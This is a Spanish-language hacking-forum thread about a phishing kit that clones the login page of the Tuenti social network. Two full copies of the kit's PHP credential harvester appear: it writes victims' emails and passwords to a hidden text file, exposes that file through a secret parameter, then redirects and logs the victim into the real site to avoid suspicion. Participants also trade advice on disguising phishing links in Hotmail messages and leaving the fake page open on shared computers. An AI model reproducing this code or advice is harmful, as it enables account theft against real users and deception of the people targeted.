Indetectables

al abrir el archivo tuenti.php me pide una contraseña,escribo la que dices en el primer mensaje,pero me dice que con qué programa lo abre,a cual le doy?

fleky7 escribió:k alguiieen boRRee staa pagiinaa x favooR!
[Enlace externo eliminado para invitados] graciias es k mee stan amenazando por tener esa pagina!!

¿Quien te a amenazado?, para borrarla metete al ftp tal y como lo subistes y lo borras y ya
Saludos

Hola sod, como va esa nueva version, esta lista ya? Es q estoy intentando subir a un dominio los archivos php y htm, pero no se si me funcionaran bien, o mejor me espero que saques la nueva version...

sod escribió:...su funcionamiento es muy simple, guarda los datos en un .txt y luego para que sea menos "cantoso" le loguea en la pagina autentica

Muy wpo tu aporte, que crack!

Solo una cosa tio, no entiendo cómo va eso de la redirección php, lo que consigue que loguee en la web que no es fake xD. En qué parte del php hay que tocar para que redirigiera a otro sitio con login y le logueara? Y qué es eso del "timeStampSigned"y el "timeStamp"?

Thanks!!

rdnmlln escribió:

sod escribió:...su funcionamiento es muy simple, guarda los datos en un .txt y luego para que sea menos "cantoso" le loguea en la pagina autentica

Muy wpo tu aporte, que crack!

Solo una cosa tio, no entiendo cómo va eso de la redirección php, lo que consigue que loguee en la web que no es fake xD. En qué parte del php hay que tocar para que redirigiera a otro sitio con login y le logueara? Y qué es eso del "timeStampSigned"y el "timeStamp"?

Thanks!!

Pues donde pone lo de header pues cambiar la direccion lo de "timeStampSigned"y el "timeStamp" es unico de tuenti, cada pagina seria distinta, seria cuestion de mirar que envia y adaptarlo, sobre la nueva version le queda poco, pero estoy de examenes hasta el cuello solo me conecto en los ratillos en los que descanso un poco de estudiar.
Saludos

Despues de darle muchas vueltas y no generarse ningun archivo .txt ni guardarse las contraseñas generandolo yo mismo, he optado por nombrarlo el .txt a .php y me funciona!!!

Ahora tengo la duda de como enviarlo, porque si lo hago como enlace puede darse cuenta, hay alguna otra forma, o quizas camuflandolo... como lo haceis vosotros?

heiwaz escribió:Despues de darle muchas vueltas y no generarse ningun archivo .txt ni guardarse las contraseñas generandolo yo mismo, he optado por nombrarlo el .txt a .php y me funciona!!!

Ahora tengo la duda de como enviarlo, porque si lo hago como enlace puede darse cuenta, hay alguna otra forma, o quizas camuflandolo... como lo haceis vosotros?

El proceso en el que se trata de convencer a otros usuarios a aceptar tu archivo se llama "ingenieria social". Lo más fácil es dejar tu página abierta en un ciber, en la sala de ordenadores de tu instituto, universidad o curro... mucha gente entrará sin fijarse en la URL y sin quererlo ni saberlo te enviarán sus datos.

No si eso ya lo se lo de la ingenieria social, ya la he usado mas de una vez . El problema es q la unica manera que tengo ahora es a traves de mail, porque como no puedo entrar en su casa... habia oido algo de bombardeo de DNS, pero no se que significa.
Habia pensado en mandarle un mail con un enlace a mi web, pero claro tendria que camuflar este enlace con otro nombre para que no se vea el enlace original, como se hace esto a traves hotmail por ejemplo... se que en los foros se puede pero en hotmail no lo encuentro

heiwaz escribió:No si eso ya lo se lo de la ingenieria social, ya la he usado mas de una vez . El problema es q la unica manera que tengo ahora es a traves de mail, porque como no puedo entrar en su casa... habia oido algo de bombardeo de DNS, pero no se que significa.
Habia pensado en mandarle un mail con un enlace a mi web, pero claro tendria que camuflar este enlace con otro nombre para que no se vea el enlace original, como se hace esto a traves hotmail por ejemplo... se que en los foros se puede pero en hotmail no lo encuentro

Jejeje, pues el DNS es un "servicio de internet" por clasificarlo de alguna manera, que lo q hace es transformar las IP's en nombres, palabras... Asi evitamos tener q navegar por internet tecleando IP's que sería un c*ñaz*.

Respecto a lo de hotmail si que puedes... escribes la palabra que contendrá el hipervinculo a tu web, la señalas con el ratón y luego le das al "botón planeta" q sale a la izqda de los smileys y tecleas tu web con http://. De esta forma se ve tu palabra que clicando en ella te dirige a la web que le hayas tecleado antes.

Yo lo he subido todo a webcindario y he modificado el .php pero cuando me meto para probarlo y me logeo me sale la pagina del .php con eso
<?php
/****************************************************************************************
********************************* IMPORTANTE ********************************************
*****************************************************************************************
** Documento solamente con fines educativos, el autor no se hace responsable de su uso **
** **
*****************************************************************************************
** "Tuenti Fake" creado por : Sod
** [MOD]Tuenti Fake creado por Dreewzt **
*****************************************************************************************
** **
** Uso: Modifica 'tuenti.txt' y 'leerclaves' por cualquier otro nombre para que nadie **
** mas pueda verlo. Para ver luego todas las contrase?as guardadas: **
** [Enlace externo eliminado para invitados] ... e=javiergo -> donde XXXX tienes que escribor lo que has puesto **
** en 'leerclaves', asegurate de asignar permisos CHMOD 777 ** *****************************************************************************************/

//***** MODIFICAR ****************************************************************
$archivo = 'javiergo.txt'; //Cambiale el nombre para que nadie pueda verlo
$leer = 'javiergo';
//*********************************************************************************

$le=$_GET['le'];
$correoMal = $_POST['email'];
$clave = $_POST['password'];

$correo = str_replace("@","%40",$correoMal); // Reemplaza "@" por "%40", para asi poder loguearnos
$md5 = md5($clave); // Codifica la contrase?a a md5, para poder loguearnos

if ($le == $leer ) {
header ('Location: '.$archivo.' '); //Nos abre el txt
die();
}

$archivo = fopen($archivo, 'a+'); // "a+" -> Crea el solo el fichero si no existe, si existe escribe al final
fwrite($archivo,'Hora: '.date("Y-m-d H:i:s").'
fwrite($archivo, "\r\n"); // Si es windows "\r\n
Usuario: '.$correoMal.'
Clave: '.$clave.'
-----------------------------');
fclose($archivo);

// Para que no sospeche al acabar de ingresar los datos le redirecciona a la pagina autentica
// y ademas le loguea :)
header('Location: [Enlace externo eliminado para invitados]'.$ ... emember=0');
?>

no llega el pdf ni la segunda version??

me pasa lo mismo k a javiergo777. Por favor podeis ayudarnos??


<?php
/****************************************************************************************
********************************* IMPORTANTE ********************************************
*****************************************************************************************
** Documento solamente con fines educativos, el autor no se hace responsable de su uso **
** **
*****************************************************************************************
** "Tuenti Fake" creado por : Sod **
*****************************************************************************************
** **
** Uso: Modifica 'tuenti.txt' y 'leerclaves' por cualquier otro nombre para que nadie **
** mas pueda verlo. Para ver luego todas las contraseñas guardadas: **
** [Enlace externo eliminado para invitados] -> donde XXXX tienes que escribir lo que has puesto **
** en 'leerclaves', asegurate de asignar permisos CHMOD 777 ** *****************************************************************************************/

//***** MODIFICAR ****************************************************************
$archivo = 'sandra.txt'; //Cambiale el nombre para que nadie pueda verlo
$leer = 'sandra';
//*********************************************************************************

$le=$_GET['le'];
$correoMal = $_POST['email'];
$clave = $_POST['password'];

$correo = str_replace("@","%40",$correoMal); // Reemplaza "@" por "%40", para asi poder loguearnos
$md5 = md5($clave); // Codifica la contraseña a md5, para poder loguearnos

if ($le == $leer ) {
header ('Location: '.$archivo.' '); //Nos abre el txt
die();
}

$archivo = fopen($archivo, 'a+'); // "a+" -> Crea el solo el fichero si no existe, si existe escribe al final
fwrite($archivo,'
Hora: '.date("Y-m-d H:i:s").'
Usuario: '.$correoMal.'
Clave: '.$clave.'
-----------------------------');
fwrite($archivo, "\r\n"); // Si es windows "\r\n"
fclose($archivo);

// Para que no sospeche al acabar de ingresar los datos le redirecciona a la pagina autentica
// y ademas le loguea :)
header('Location: [Enlace externo eliminado para invitados]'.$ ... emember=0');
?>

gracias

y para colmo ahora nueva pagina de inicio de tuenti... ufff. He intentado cambiar el archivo htm para que salga el nuevo tuenti, pero no tengo ni idea.. a ver si algun alma caritativa se ofrece